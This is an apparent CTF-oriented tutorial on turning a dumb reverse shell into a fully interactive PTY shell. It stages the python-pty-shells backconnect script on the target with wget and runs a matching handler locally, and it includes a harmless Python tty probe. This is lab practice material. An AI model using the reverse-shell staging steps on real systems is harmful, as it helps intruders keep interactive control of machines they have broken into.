Before performing the following steps, make sure you already have a remote shell from your target machine (any shell should work, including the dumb ones)!
The biggest issue you face while holding a remote shell on a TryHackMe, HackTheBox or any other target machine is that those reverse shells are dumb.
With a dumb shell you can't autocomplete, use the arrow keys to recall a previously entered command, or correct a typo in your current long command. But the worst part is that you can't AUTOCOMPLETE!
To resolve this issue, we can use a really awesome method based on Python. All that is needed is for Python to be present on both the local and the target machine, and you are good to go!
So, here are the steps to resolve one of the biggest issues in our lives!
1. Check if `python` is installed on both your target and local machine using the command:
$ which python
2. If you get an output similar to /usr/bin/python, then you are good to go!
3. Git clone the python-pty-shells repository.
4. Open the cloned repository and edit the tcp_pty_backconnect.py script to add your local IP and the port on which you want to receive the interactive shell.
5. Once you've updated `lhost` and `lport` in the script, send it to your target machine by starting a simple Python HTTP server on your local machine and fetching the file on the target with `wget`.
6. Next, run the tcp_pty_shell_handler.py script on your local machine, passing it your local IP and port (the same ones entered in the backconnect script) as parameters:
┌──(kali㉿kali)-[~/Desktop/python-pty-shells]
└─$ python tcp_pty_shell_handler.py -b <local_ip>:<listening_port>
7. After that, start tcp_pty_backconnect.py on the target machine:
$ python tcp_pty_backconnect.py
8. And we have a fully interactive reverse shell!
Note: As of now, this only works with `python` and not with `python3`.
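Why the PTY matters: in a plain reverse shell the shell's stdin and stdout are a socket, so every program inside it sees "not a terminal" and switches off line editing, history keys and tab completion; the backconnect script instead runs the shell on a pseudo-terminal. The probe below is an added example (Python 3 standard library only, not code from the python-pty-shells project) that runs the same child both ways and reports whether it sees a tty.

```python
import os
import subprocess
import sys

# Child command: exit 0 if its stdin is a terminal, 1 if it is a pipe/socket.
# This is the same check a shell or readline performs before enabling
# line editing, arrow-key history and tab completion.
PROBE_CMD = [sys.executable, "-c",
             "import os, sys; sys.exit(0 if os.isatty(0) else 1)"]


def child_sees_tty_via_pipe():
    """Run the probe the way a dumb reverse shell runs: fds are pipes/sockets."""
    proc = subprocess.run(PROBE_CMD, stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return proc.returncode == 0


def child_sees_tty_via_pty():
    """Run the probe on a freshly allocated pseudo-terminal, as a PTY shell does.

    The slave end becomes the child's stdin/stdout/stderr. Whoever holds the
    master end (here: this script; in the backconnect case: the code relaying
    bytes to and from the socket) reads what the child writes and injects the
    keystrokes the child reads, so the child believes it is on a real terminal.
    """
    master_fd, slave_fd = os.openpty()
    try:
        proc = subprocess.run(PROBE_CMD, stdin=slave_fd,
                              stdout=slave_fd, stderr=slave_fd)
    finally:
        os.close(slave_fd)
        os.close(master_fd)
    return proc.returncode == 0


if __name__ == "__main__":
    print("pipe -> child sees a tty:", child_sees_tty_via_pipe())  # False
    print("pty  -> child sees a tty:", child_sees_tty_via_pty())   # True
```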
Do check out my other work and write-ups at https://github.com/0xNirvana